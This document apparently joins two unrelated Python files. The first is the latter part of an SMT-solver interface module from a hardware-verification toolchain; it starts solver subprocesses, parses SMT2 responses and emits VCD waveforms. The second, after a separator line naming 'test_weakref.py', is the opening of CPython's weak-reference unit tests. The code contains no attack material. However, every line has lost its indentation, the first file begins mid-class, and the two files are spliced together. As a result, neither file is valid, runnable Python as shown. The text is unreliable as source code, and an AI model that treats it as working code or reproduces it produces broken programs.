self.timeinfo = os.name != "nt"
self.unroll = False
self.noincr = False
self.info_stmts = list()
self.nocomments = False
self.start_time = time()
self.modinfo = dict()
self.curmod = None
self.topmod = None
self.setup_done = False
def __del__(self):
if self.p is not None and not forced_shutdown:
os.killpg(os.getpgid(self.p.pid), signal.SIGTERM)
if running_solvers is not None:
del running_solvers[self.p_index]
def setup(self):
assert not self.setup_done
if self.forall:
self.unroll = False
if self.solver == "yices":
if self.noincr:
self.popen_vargs = ['yices-smt2'] + self.solver_opts
else:
self.popen_vargs = ['yices-smt2', '--incremental'] + self.solver_opts
if self.solver == "z3":
self.popen_vargs = ['z3', '-smt2', '-in'] + self.solver_opts
if self.solver == "cvc4":
if self.noincr:
self.popen_vargs = ['cvc4', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
else:
self.popen_vargs = ['cvc4', '--incremental', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
if self.solver == "mathsat":
self.popen_vargs = ['mathsat'] + self.solver_opts
if self.solver == "boolector":
if self.noincr:
self.popen_vargs = ['boolector', '--smt2'] + self.solver_opts
else:
self.popen_vargs = ['boolector', '--smt2', '-i'] + self.solver_opts
self.unroll = True
if self.solver == "abc":
if len(self.solver_opts) > 0:
self.popen_vargs = ['yosys-abc', '-S', '; '.join(self.solver_opts)]
else:
self.popen_vargs = ['yosys-abc', '-S', '%blast; &sweep -C 5000; &syn4; &cec -s -m -C 2000']
self.logic_ax = False
self.unroll = True
self.noincr = True
if self.solver == "dummy":
assert self.dummy_file is not None
self.dummy_fd = open(self.dummy_file, "r")
else:
if self.dummy_file is not None:
self.dummy_fd = open(self.dummy_file, "w")
if not self.noincr:
self.p_open()
if self.unroll:
assert not self.forall
self.logic_uf = False
self.unroll_idcnt = 0
self.unroll_buffer = ""
self.unroll_sorts = set()
self.unroll_objs = set()
self.unroll_decls = dict()
self.unroll_cache = dict()
self.unroll_stack = list()
if self.logic is None:
self.logic = ""
if self.logic_qf: self.logic += "QF_"
if self.logic_ax: self.logic += "A"
if self.logic_uf: self.logic += "UF"
if self.logic_bv: self.logic += "BV"
if self.logic_dt: self.logic = "ALL"
self.setup_done = True
for stmt in self.info_stmts:
self.write(stmt)
if self.produce_models:
self.write("(set-option :produce-models true)")
self.write("(set-logic %s)" % self.logic)
def timestamp(self):
secs = int(time() - self.start_time)
return "## %3d:%02d:%02d " % (secs // (60*60), (secs // 60) % 60, secs % 60)
def replace_in_stmt(self, stmt, pat, repl):
if stmt == pat:
return repl
if isinstance(stmt, list):
return [self.replace_in_stmt(s, pat, repl) for s in stmt]
return stmt
def unroll_stmt(self, stmt):
if not isinstance(stmt, list):
return stmt
stmt = [self.unroll_stmt(s) for s in stmt]
if len(stmt) >= 2 and not isinstance(stmt[0], list) and stmt[0] in self.unroll_decls:
assert stmt[1] in self.unroll_objs
key = tuple(stmt)
if key not in self.unroll_cache:
decl = deepcopy(self.unroll_decls[key[0]])
self.unroll_cache[key] = "|UNROLL#%d|" % self.unroll_idcnt
decl[1] = self.unroll_cache[key]
self.unroll_idcnt += 1
if decl[0] == "declare-fun":
if isinstance(decl[3], list) or decl[3] not in self.unroll_sorts:
self.unroll_objs.add(decl[1])
decl[2] = list()
else:
self.unroll_objs.add(decl[1])
decl = list()
elif decl[0] == "define-fun":
arg_index = 1
for arg_name, arg_sort in decl[2]:
decl[4] = self.replace_in_stmt(decl[4], arg_name, key[arg_index])
arg_index += 1
decl[2] = list()
if len(decl) > 0:
decl = self.unroll_stmt(decl)
self.write(self.unparse(decl), unroll=False)
return self.unroll_cache[key]
return stmt
def p_thread_main(self):
while True:
data = self.p.stdout.readline().decode("ascii")
if data == "": break
self.p_queue.put(data)
self.p_queue.put("")
self.p_running = False
def p_open(self):
assert self.p is None
self.p = subprocess.Popen(self.popen_vargs, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
running_solvers[self.p_index] = self.p
self.p_running = True
self.p_next = None
self.p_queue = Queue()
self.p_thread = Thread(target=self.p_thread_main)
self.p_thread.start()
def p_write(self, data, flush):
assert self.p is not None
self.p.stdin.write(bytes(data, "ascii"))
if flush: self.p.stdin.flush()
def p_read(self):
assert self.p is not None
if self.p_next is not None:
data = self.p_next
self.p_next = None
return data
if not self.p_running:
return ""
return self.p_queue.get()
def p_poll(self, timeout=0.1):
assert self.p is not None
assert self.p_running
if self.p_next is not None:
return False
try:
self.p_next = self.p_queue.get(True, timeout)
return False
except Empty:
return True
def p_close(self):
assert self.p is not None
self.p.stdin.close()
self.p_thread.join()
assert not self.p_running
del running_solvers[self.p_index]
self.p = None
self.p_next = None
self.p_queue = None
self.p_thread = None
def write(self, stmt, unroll=True):
if stmt.startswith(";"):
self.info(stmt)
if not self.setup_done:
self.info_stmts.append(stmt)
return
elif not self.setup_done:
self.setup()
stmt = stmt.strip()
if self.nocomments or self.unroll:
stmt = re.sub(r" *;.*", "", stmt)
if stmt == "": return
if unroll and self.unroll:
stmt = self.unroll_buffer + stmt
self.unroll_buffer = ""
s = re.sub(r"\|[^|]*\|", "", stmt)
if s.count("(") != s.count(")"):
self.unroll_buffer = stmt + " "
return
s = self.parse(stmt)
if self.debug_print:
print("-> %s" % s)
if len(s) == 3 and s[0] == "declare-sort" and s[2] == "0":
self.unroll_sorts.add(s[1])
return
elif len(s) == 4 and s[0] == "declare-fun" and s[2] == [] and s[3] in self.unroll_sorts:
self.unroll_objs.add(s[1])
return
elif len(s) >= 4 and s[0] == "declare-fun":
for arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
elif len(s) >= 4 and s[0] == "define-fun":
for arg_name, arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
stmt = self.unparse(self.unroll_stmt(s))
if stmt == "(push 1)":
self.unroll_stack.append((
deepcopy(self.unroll_sorts),
deepcopy(self.unroll_objs),
deepcopy(self.unroll_decls),
deepcopy(self.unroll_cache),
))
if stmt == "(pop 1)":
self.unroll_sorts, self.unroll_objs, self.unroll_decls, self.unroll_cache = self.unroll_stack.pop()
if self.debug_print:
print("> %s" % stmt)
if self.debug_file:
print(stmt, file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None and not stmt.startswith("(get-"):
self.p_close()
if stmt == "(push 1)":
self.smt2cache.append(list())
elif stmt == "(pop 1)":
self.smt2cache.pop()
else:
if self.p is not None:
self.p_write(stmt + "\n", True)
self.smt2cache[-1].append(stmt)
else:
self.p_write(stmt + "\n", True)
def info(self, stmt):
if not stmt.startswith("; yosys-smt2-"):
return
fields = stmt.split()
if fields[1] == "yosys-smt2-nomem":
if self.logic is None:
self.logic_ax = False
if fields[1] == "yosys-smt2-nobv":
if self.logic is None:
self.logic_bv = False
if fields[1] == "yosys-smt2-stdt":
if self.logic is None:
self.logic_dt = True
if fields[1] == "yosys-smt2-forall":
if self.logic is None:
self.logic_qf = False
self.forall = True
if fields[1] == "yosys-smt2-module":
self.curmod = fields[2]
self.modinfo[self.curmod] = SmtModInfo()
if fields[1] == "yosys-smt2-cell":
self.modinfo[self.curmod].cells[fields[3]] = fields[2]
if fields[1] == "yosys-smt2-topmod":
self.topmod = fields[2]
if fields[1] == "yosys-smt2-input":
self.modinfo[self.curmod].inputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-output":
self.modinfo[self.curmod].outputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-register":
self.modinfo[self.curmod].registers.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-memory":
self.modinfo[self.curmod].memories[fields[2]] = (int(fields[3]), int(fields[4]), int(fields[5]), int(fields[6]), fields[7] == "async")
if fields[1] == "yosys-smt2-wire":
self.modinfo[self.curmod].wires.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-clock":
for edge in fields[3:]:
if fields[2] not in self.modinfo[self.curmod].clocks:
self.modinfo[self.curmod].clocks[fields[2]] = edge
elif self.modinfo[self.curmod].clocks[fields[2]] != edge:
self.modinfo[self.curmod].clocks[fields[2]] = "event"
if fields[1] == "yosys-smt2-assert":
self.modinfo[self.curmod].asserts["%s_a %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-cover":
self.modinfo[self.curmod].covers["%s_c %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-anyconst":
self.modinfo[self.curmod].anyconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-anyseq":
self.modinfo[self.curmod].anyseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allconst":
self.modinfo[self.curmod].allconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allseq":
self.modinfo[self.curmod].allseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
def hiernets(self, top, regs_only=False):
def hiernets_worker(nets, mod, cursor):
for netname in sorted(self.modinfo[mod].wsize.keys()):
if not regs_only or netname in self.modinfo[mod].registers:
nets.append(cursor + [netname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiernets_worker(nets, celltype, cursor + [cellname])
nets = list()
hiernets_worker(nets, top, [])
return nets
def hieranyconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hieranyseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hiermems(self, top):
def hiermems_worker(mems, mod, cursor):
for memname in sorted(self.modinfo[mod].memories.keys()):
mems.append(cursor + [memname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiermems_worker(mems, celltype, cursor + [cellname])
mems = list()
hiermems_worker(mems, top, [])
return mems
def read(self):
stmt = []
count_brackets = 0
while True:
if self.solver == "dummy":
line = self.dummy_fd.readline().strip()
else:
line = self.p_read().strip()
if self.dummy_file is not None:
self.dummy_fd.write(line + "\n")
count_brackets += line.count("(")
count_brackets -= line.count(")")
stmt.append(line)
if self.debug_print:
print("< %s" % line)
if count_brackets == 0:
break
if self.solver != "dummy" and self.p.poll():
print("%s Solver terminated unexpectedly: %s" % (self.timestamp(), "".join(stmt)), flush=True)
sys.exit(1)
stmt = "".join(stmt)
if stmt.startswith("(error"):
print("%s Solver Error: %s" % (self.timestamp(), stmt), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return stmt
def check_sat(self):
if self.debug_print:
print("> (check-sat)")
if self.debug_file and not self.nocomments:
print("; running check-sat..", file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None:
self.p_close()
self.p_open()
for cache_ctx in self.smt2cache:
for cache_stmt in cache_ctx:
self.p_write(cache_stmt + "\n", False)
self.p_write("(check-sat)\n", True)
if self.timeinfo:
i = 0
s = "/-\|"
count = 0
num_bs = 0
while self.p_poll():
count += 1
if count < 25:
continue
if count % 10 == 0 or count == 25:
secs = count // 10
if secs < 60:
m = "(%d seconds)" % secs
elif secs < 60*60:
m = "(%d seconds -- %d:%02d)" % (secs, secs // 60, secs % 60)
else:
m = "(%d seconds -- %d:%02d:%02d)" % (secs, secs // (60*60), (secs // 60) % 60, secs % 60)
print("%s %s %c" % ("\b \b" * num_bs, m, s[i]), end="", file=sys.stderr)
num_bs = len(m) + 3
else:
print("\b" + s[i], end="", file=sys.stderr)
sys.stderr.flush()
i = (i + 1) % len(s)
if num_bs != 0:
print("\b \b" * num_bs, end="", file=sys.stderr)
sys.stderr.flush()
else:
count = 0
while self.p_poll(60):
count += 1
msg = None
if count == 1:
msg = "1 minute"
elif count in [5, 10, 15, 30]:
msg = "%d minutes" % count
elif count == 60:
msg = "1 hour"
elif count % 60 == 0:
msg = "%d hours" % (count // 60)
if msg is not None:
print("%s waiting for solver (%s)" % (self.timestamp(), msg), flush=True)
result = self.read()
if self.debug_file:
print("(set-info :status %s)" % result, file=self.debug_file)
print("(check-sat)", file=self.debug_file)
self.debug_file.flush()
if result not in ["sat", "unsat"]:
if result == "":
print("%s Unexpected EOF response from solver." % (self.timestamp()), flush=True)
else:
print("%s Unexpected response from solver: %s" % (self.timestamp(), result), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return result
def parse(self, stmt):
def worker(stmt):
if stmt[0] == '(':
expr = []
cursor = 1
while stmt[cursor] != ')':
el, le = worker(stmt[cursor:])
expr.append(el)
cursor += le
return expr, cursor+1
if stmt[0] == '|':
expr = "|"
cursor = 1
while stmt[cursor] != '|':
expr += stmt[cursor]
cursor += 1
expr += "|"
return expr, cursor+1
if stmt[0] in [" ", "\t", "\r", "\n"]:
el, le = worker(stmt[1:])
return el, le+1
expr = ""
cursor = 0
while stmt[cursor] not in ["(", ")", "|", " ", "\t", "\r", "\n"]:
expr += stmt[cursor]
cursor += 1
return expr, cursor
return worker(stmt)[0]
def unparse(self, stmt):
if isinstance(stmt, list):
return "(" + " ".join([self.unparse(s) for s in stmt]) + ")"
return stmt
def bv2hex(self, v):
h = ""
v = self.bv2bin(v)
while len(v) > 0:
d = 0
if len(v) > 0 and v[-1] == "1": d += 1
if len(v) > 1 and v[-2] == "1": d += 2
if len(v) > 2 and v[-3] == "1": d += 4
if len(v) > 3 and v[-4] == "1": d += 8
h = hex(d)[2:] + h
if len(v) < 4: break
v = v[:-4]
return h
def bv2bin(self, v):
if type(v) is list and len(v) == 3 and v[0] == "_" and v[1].startswith("bv"):
x, n = int(v[1][2:]), int(v[2])
return "".join("1" if (x & (1 << i)) else "0" for i in range(n-1, -1, -1))
if v == "true": return "1"
if v == "false": return "0"
if v.startswith("#b"):
return v[2:]
if v.startswith("#x"):
return "".join(hex_dict.get(x) for x in v[2:])
assert False
def bv2int(self, v):
return int(self.bv2bin(v), 2)
def get(self, expr):
self.write("(get-value (%s))" % (expr))
return self.parse(self.read())[0][1]
def get_list(self, expr_list):
if len(expr_list) == 0:
return []
self.write("(get-value (%s))" % " ".join(expr_list))
return [n[1] for n in self.parse(self.read())]
def get_path(self, mod, path):
assert mod in self.modinfo
path = path.split(".")
for i in range(len(path)-1):
first = ".".join(path[0:i+1])
second = ".".join(path[i+1:])
if first in self.modinfo[mod].cells:
nextmod = self.modinfo[mod].cells[first]
return [first] + self.get_path(nextmod, second)
return [".".join(path)]
def net_expr(self, mod, base, path):
if len(path) == 0:
return base
if len(path) == 1:
assert mod in self.modinfo
if path[0] == "":
return base
if path[0] in self.modinfo[mod].cells:
return "(|%s_h %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].wsize:
return "(|%s_n %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].memories:
return "(|%s_m %s| %s)" % (mod, path[0], base)
assert 0
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.net_expr(nextmod, nextbase, path[1:])
def net_width(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
assert net_path[-1] in self.modinfo[mod].wsize
return self.modinfo[mod].wsize[net_path[-1]]
def net_clock(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
if net_path[-1] not in self.modinfo[mod].clocks:
return None
return self.modinfo[mod].clocks[net_path[-1]]
def net_exists(self, mod, net_path):
for i in range(len(net_path)-1):
if mod not in self.modinfo: return False
if net_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[net_path[i]]
if mod not in self.modinfo: return False
if net_path[-1] not in self.modinfo[mod].wsize: return False
return True
def mem_exists(self, mod, mem_path):
for i in range(len(mem_path)-1):
if mod not in self.modinfo: return False
if mem_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[mem_path[i]]
if mod not in self.modinfo: return False
if mem_path[-1] not in self.modinfo[mod].memories: return False
return True
def mem_expr(self, mod, base, path, port=None, infomode=False):
if len(path) == 1:
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].memories
if infomode:
return self.modinfo[mod].memories[path[0]]
return "(|%s_m%s %s| %s)" % (mod, "" if port is None else ":%s" % port, path[0], base)
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.mem_expr(nextmod, nextbase, path[1:], port=port, infomode=infomode)
def mem_info(self, mod, path):
return self.mem_expr(mod, "", path, infomode=True)
def get_net(self, mod_name, net_path, state_name):
return self.get(self.net_expr(mod_name, state_name, net_path))
def get_net_list(self, mod_name, net_path_list, state_name):
return self.get_list([self.net_expr(mod_name, state_name, n) for n in net_path_list])
def get_net_hex(self, mod_name, net_path, state_name):
return self.bv2hex(self.get_net(mod_name, net_path, state_name))
def get_net_hex_list(self, mod_name, net_path_list, state_name):
return [self.bv2hex(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def get_net_bin(self, mod_name, net_path, state_name):
return self.bv2bin(self.get_net(mod_name, net_path, state_name))
def get_net_bin_list(self, mod_name, net_path_list, state_name):
return [self.bv2bin(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def wait(self):
if self.p is not None:
self.p.wait()
self.p_close()
class SmtOpts:
def __init__(self):
self.shortopts = "s:S:v"
self.longopts = ["unroll", "noincr", "noprogress", "dump-smt2=", "logic=", "dummy=", "info=", "nocomments"]
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.unroll = False
self.noincr = False
self.timeinfo = os.name != "nt"
self.logic = None
self.info_stmts = list()
self.nocomments = False
def handle(self, o, a):
if o == "-s":
self.solver = a
elif o == "-S":
self.solver_opts.append(a)
elif o == "-v":
self.debug_print = True
elif o == "--unroll":
self.unroll = True
elif o == "--noincr":
self.noincr = True
elif o == "--noprogress":
self.timeinfo = False
elif o == "--dump-smt2":
self.debug_file = open(a, "w")
elif o == "--logic":
self.logic = a
elif o == "--dummy":
self.dummy_file = a
elif o == "--info":
self.info_stmts.append(a)
elif o == "--nocomments":
self.nocomments = True
else:
return False
return True
def helpmsg(self):
return """
-s <solver>
set SMT solver: z3, yices, boolector, cvc4, mathsat, dummy
default: yices
-S <opt>
pass <opt> as command line argument to the solver
--logic <smt2_logic>
use the specified SMT2 logic (e.g. QF_AUFBV)
--dummy <filename>
if solver is "dummy", read solver output from that file
otherwise: write solver output to that file
-v
enable debug output
--unroll
unroll uninterpreted functions
--noincr
don't use incremental solving, instead restart solver for
each (check-sat). This also avoids (push) and (pop).
--noprogress
disable timer display during solving
(this option is set implicitly on Windows)
--dump-smt2 <filename>
write smt2 statements to file
--info <smt2-info-stmt>
include the specified smt2 info statement in the smt2 output
--nocomments
strip all comments from the generated smt2 code
"""
class MkVcd:
def __init__(self, f):
self.f = f
self.t = -1
self.nets = dict()
self.clocks = dict()
def add_net(self, path, width):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, width)
def add_clock(self, path, edge):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, 1)
self.clocks[path] = (key, edge)
def set_net(self, path, bits):
path = tuple(path)
assert self.t >= 0
assert path in self.nets
if path not in self.clocks:
print("b%s %s" % (bits, self.nets[path][0]), file=self.f)
def escape_name(self, name):
name = re.sub(r"\[([0-9a-zA-Z_]*[a-zA-Z_][0-9a-zA-Z_]*)\]", r"<\1>", name)
if re.match("[\[\]]", name) and name[0] != "\\":
name = "\\" + name
return name
def set_time(self, t):
assert t >= self.t
if t != self.t:
if self.t == -1:
print("$var integer 32 t smt_step $end", file=self.f)
print("$var event 1 ! smt_clock $end", file=self.f)
scope = []
for path in sorted(self.nets):
key, width = self.nets[path]
uipath = list(path)
if "." in uipath[-1]:
uipath = uipath[0:-1] + uipath[-1].split(".")
for i in range(len(uipath)):
uipath[i] = re.sub(r"\[([^\]]*)\]", r"<\1>", uipath[i])
while uipath[:len(scope)] != scope:
print("$upscope $end", file=self.f)
scope = scope[:-1]
while uipath[:-1] != scope:
print("$scope module %s $end" % uipath[len(scope)], file=self.f)
scope.append(uipath[len(scope)])
if path in self.clocks and self.clocks[path][1] == "event":
print("$var event 1 %s %s $end" % (key, uipath[-1]), file=self.f)
else:
print("$var wire %d %s %s $end" % (width, key, uipath[-1]), file=self.f)
for i in range(len(scope)):
print("$upscope $end", file=self.f)
print("$enddefinitions $end", file=self.f)
self.t = t
assert self.t >= 0
if self.t > 0:
print("#%d" % (10 * self.t - 5), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "posedge":
print("b0 %s" % self.nets[path][0], file=self.f)
elif self.clocks[path][1] == "negedge":
print("b1 %s" % self.nets[path][0], file=self.f)
print("#%d" % (10 * self.t), file=self.f)
print("1!", file=self.f)
print("b%s t" % format(self.t, "032b"), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "negedge":
print("b0 %s" % self.nets[path][0], file=self.f)
else:
print("b1 %s" % self.nets[path][0], file=self.f)
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper, ALWAYS_EQ
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
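# Illustration only (mirrors how the threaded MappingTestCase tests below use
# this helper): mutate a weak dict while the background thread keeps forcing
# collections, so implicit removals can race with the main thread.
#
#   with collect_in_thread():
#       d = weakref.WeakValueDictionary()
#       for _ in range(100000):
#           d[10] = RefCycle()  # the previous value may be collected at any point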
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
def test_proxy_matmul(self):
class C:
def __matmul__(self, other):
return 1729
def __rmatmul__(self, other):
return -163
def __imatmul__(self, other):
return 561
o = C()
p = weakref.proxy(o)
self.assertEqual(p @ 5, 1729)
self.assertEqual(5 @ p, -163)
p @= 5
self.assertEqual(p, 561)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
